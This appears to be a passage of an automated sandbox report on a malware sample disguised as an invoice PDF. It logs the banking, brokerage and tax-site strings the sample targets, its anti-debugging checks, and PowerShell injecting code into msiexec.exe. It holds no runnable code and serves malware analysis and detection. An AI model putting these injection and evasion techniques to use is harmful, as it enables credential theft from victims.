          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: powershell.exe, 00000002.00000002.2413511774.0000000004EF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\jq
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: powershell.exe, 00000002.00000002.2413511774.0000000004EF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\jq
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: msiexec.exe, 00000005.00000002.3303268836.0000000022C40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3912
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3915
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_072B6B38 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,2_2_072B6B38
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3B40000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
